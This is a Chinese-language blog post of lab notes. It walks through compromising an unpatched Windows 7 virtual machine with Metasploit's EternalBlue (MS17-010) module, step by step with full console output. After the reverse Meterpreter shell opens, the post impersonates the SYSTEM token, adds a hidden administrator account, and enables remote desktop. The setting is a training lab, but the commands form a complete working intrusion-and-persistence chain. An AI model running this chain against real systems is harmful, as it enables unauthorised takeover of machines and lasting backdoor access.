渗透win7笔记

实验环境:

靶机:Win7(关闭防火墙,未装永恒之蓝漏洞补丁)192.168.88.135

渗透设备:kali 192.168.88.133(渗透)windows 192.168.88.134(远程登陆验证)

渗透步骤:

  1. 进入渗透环境,命令msfconsole
  2. 查询永恒之蓝对应的漏洞(ms17-010),命令search ms17-010

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce

  1. 使用第2个漏洞,命令use 2

[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp

  1. 查看基础设置,命令options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax '[file:](file://%3cpath%3e)'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.88.133 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs

  1. 设置攻击目标,命令set rhosts 192.168.88.135

rhosts => 192.168.88.135

  1. 检查基础设置,命令options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.88.135 yes The target host(s), range CIDR identifier, or hosts file with syntax '[file:](file://%3cpath%3e)'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.88.133 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
1

  1. 进行渗透尝试,命令run

[*] Started reverse TCP handler on 192.168.88.133:4444
[*] 192.168.88.135:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.88.135:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7600 x64 (64-bit)
[*] 192.168.88.135:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.88.135:445 - Connecting to target for exploitation.
[+] 192.168.88.135:445 - Connection established for exploitation.
[+] 192.168.88.135:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.88.135:445 - CORE raw buffer dump (23 bytes)
[*] 192.168.88.135:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.88.135:445 - 0x00000010 74 65 20 37 36 30 30 te 7600
[+] 192.168.88.135:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.88.135:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.88.135:445 - Sending all but last fragment of exploit packet
[*] 192.168.88.135:445 - Starting non-paged pool grooming
[+] 192.168.88.135:445 - Sending SMBv2 buffers
[+] 192.168.88.135:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.88.135:445 - Sending final SMBv2 buffers.
[*] 192.168.88.135:445 - Sending last fragment of exploit packet!
[*] 192.168.88.135:445 - Receiving response from exploit packet
[+] 192.168.88.135:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.88.135:445 - Sending egg to corrupted connection.
[*] 192.168.88.135:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.88.135
[*] Meterpreter session 1 opened (192.168.88.133:4444 -> 192.168.88.135:49159) at 2022-06-07 23:22:11 -0400
[+] 192.168.88.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.88.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.88.135:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

  1. 返回结果出现“win”,表明渗透成功
  2. 进入提权模式 ,命令use incognito

Loading extension incognito...Success.

  1. 查看可用权限,命令list\_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
yyx-PC\yyx

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

  1. 切换到SYSTEM权限,命令impersonate_token "NT AUTHORITY\SYSTEM"

[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM

  1. 进入Windows命令提示符环境,命令shell

Process 2924 created.
Channel 2 created.
Microsoft Windows [°汾 6.1.7600]
°爨̹Ԑ (c) 2009 Microsoft Corporation¡£±£´̹ԐȨ{¡£

  1. 创建Windows用户,命令net user oldboy goodITedu@159 /add(用户名和密码自己设置)

net user oldboy goodITedu@159 /add
ļ®³ɹ¦Ϊ³ɡ£

  1. 查看用户列表是否存在oldboy,命令net user

net user

\\ µœû§֊»§

-------------------------------------------------------------------------------
Administrator Guest oldboy
test yyx
ļ®ՋѐΪ±ϣ¬µ«·¢ʺһ¸򼲶๶´¡£

  1. 将其加入到本地管理员组,命令net localgroup administrators oldboy

net localgroup administrators oldboy /add
ļ®³ɹ¦Ϊ³ɡ£

  1. 查看oldboy是否在本地管理员组中,命令net localgroup administrators

net localgroup administrators
±񄹠 administrators
עˍ ¹݀¶ԼNj㼺/ԲԐ²»˜О׆µō눫·Ďˈ¨

³ʔ±

-------------------------------------------------------------------------------
Administrator
oldboy
test
yyx
ļ®³ɹ¦Ϊ³ɡ£

  1. 退出Windows命令提示符环境,命令exit
  2. 激活靶机远程桌面功能,命令run post/windows/manage/enable_rdp

[*] Enabling Remote Desktop
[*]         RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*]         The Terminal Services service is not set to auto, changing it to auto ...
[*]         Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /home/kali/.msf4/loot/20220608003051_default_192.168.88.135_host.windows.cle_785342.txt

  1. 切换到Windows设备进行远程登陆验证。
posted @ 2022-06-08 13:48  singeryoung  阅读(228)  评论(0编辑  收藏  举报